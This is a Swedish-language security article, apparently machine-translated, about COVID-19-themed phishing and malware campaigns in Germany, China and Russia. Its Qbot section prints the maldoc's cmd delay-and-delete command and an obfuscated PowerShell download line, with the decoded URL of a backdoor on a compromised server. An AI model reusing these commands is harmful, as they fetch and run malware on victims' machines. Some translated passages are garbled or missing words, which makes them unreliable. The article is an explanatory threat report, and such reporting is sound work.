Angripare fortsätter att utnyttja COVID-19-ämnet och skapar fler och fler hot för användare som är mycket intresserade av allt som har med epidemin att göra. I Vi har redan pratat om vilka typer av skadlig programvara som dök upp i spåren av coronaviruset, och idag kommer vi att prata om social ingenjörsteknik som användare i olika länder, inklusive Ryssland, redan har stött på. Allmänna trender och exempel är under snittet.
Kom ihåg in Vi pratade om det faktum att folk är villiga att läsa inte bara om coronaviruset och epidemins förlopp, utan också om ekonomiska stödåtgärder? Här är ett bra exempel. En intressant nätfiskeattack upptäcktes i den tyska delstaten Nordrhein-Westfalen eller NRW. Angriparna skapade kopior av ekonomiministeriets webbplats (), där vem som helst kan ansöka om ekonomiskt bistånd. Ett sådant program finns faktiskt, och det visade sig vara fördelaktigt för bedragare. Efter att ha fått personliga uppgifter om sina offer gjorde de en ansökan på den verkliga ministeriets webbplats, men angav andra bankuppgifter. Enligt officiella uppgifter gjordes 4 tusen sådana falska förfrågningar tills systemet upptäcktes. Som ett resultat föll 109 miljoner dollar avsedda för drabbade medborgare i händerna på bedragare.
Vill du ha ett gratis test för COVID-19?
Ett annat viktigt exempel på nätfiske med coronavirus-tema var i mejl. Meddelanden uppmärksammades av användare med ett erbjudande att genomgå gratis testning för coronavirusinfektion. I bilagan till dessa det fanns instanser av Trickbot/Qakbot/Qbot. Och när de som ville kontrollera sin hälsa började "fylla i det bifogade formuläret", laddades ett skadligt skript ner till datorn. Och för att undvika sandlådetestning började skriptet ladda ner huvudviruset först efter en tid, när skyddssystemen var övertygade om att ingen skadlig aktivitet skulle inträffa.
Att övertyga de flesta användare att aktivera makron var också enkelt. För att göra detta användes ett standardknep: för att fylla i frågeformuläret måste du först aktivera makron, vilket innebär att du måste köra ett VBA-skript.
Som du kan se är VBA-skriptet speciellt maskerat från antivirus.
Windows har en väntefunktion där programmet väntar /T <sekunder> innan det accepterar standardsvaret "Ja". I vårt fall väntade skriptet 65 sekunder innan temporära filer raderades:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Och i väntan laddades skadlig programvara ner. Ett speciellt PowerShell-skript lanserades för detta:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Efter avkodning av Base64-värdet laddar PowerShell-skriptet ned bakdörren som finns på den tidigare hackade webbservern från Tyskland:
http://automatischer-staubsauger.com/feature/777777.pngoch sparar den under namnet:
C:UsersPublictmpdirfile1.exe
Mapp ‘C:UsersPublictmpdir’ raderas när filen 'tmps1.bat' som innehåller kommandot körs cmd /c mkdir ""C:UsersPublictmpdir"".
Riktad attack mot statliga myndigheter
Dessutom rapporterade FireEye-analytiker nyligen en riktad APT32-attack riktad mot regeringsstrukturer i Wuhan, såväl som det kinesiska ministeriet för krishantering. En av de distribuerade RTF:erna innehöll en länk till en artikel i New York Times med titeln . Men när den lästes laddades skadlig programvara ner (FireEye-analytiker identifierade instansen som METALJACK).
Intressant nog, vid tidpunkten för upptäckten upptäckte inget av antivirusen denna instans, enligt Virustotal.
När officiella webbplatser är nere
Det mest slående exemplet på en nätfiskeattack inträffade i Ryssland häromdagen. Anledningen till detta var utnämningen av en efterlängtad förmån för barn i åldrarna 3 till 16 år. När starten för att acceptera ansökningar tillkännagavs den 12 maj 2020 rusade miljoner till statens webbplats för den efterlängtade hjälpen och slog ner portalen inte värre än en professionell DDoS-attack. När presidenten sa att "statliga tjänster inte kunde hantera flödet av ansökningar" började folk prata online om lanseringen av en alternativ sida för att acceptera ansökningar.
Problemet är att flera sajter började fungera samtidigt, och medan en, den riktiga på posobie16.gosuslugi.ru, faktiskt accepterar ansökningar, mer .
Kollegor från SearchInform hittade cirka 30 nya bedrägliga domäner i .ru-zonen. Infosecurity och Softline Company har spårat mer än 70 liknande falska webbplatser för statliga tjänster sedan början av april. Deras skapare manipulerar välbekanta symboler och använder även kombinationer av orden gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, och så vidare.
Hype och social ingenjörskonst
Alla dessa exempel bekräftar bara att angripare framgångsrikt tjänar pengar på ämnet coronavirus. Och ju högre social spänning är och ju mer oklara frågor, desto större chans har bedragare att stjäla viktig data, tvinga människor att ge upp sina pengar på egen hand eller helt enkelt hacka fler datorer.
Och med tanke på att pandemin har tvingat potentiellt oförberedda människor att arbeta hemifrån i massor, är inte bara personlig data utan även företagsdata i fara. Till exempel har nyligen Microsoft 365 (tidigare Office 365) användare också utsatts för en nätfiskeattack. Människor fick massiva "missade" röstmeddelanden som bilagor till brev. Men filerna var faktiskt en HTML-sida som skickade offren för attacken till . Som ett resultat förlust av åtkomst och äventyrar all data från kontot.
Källa: will.com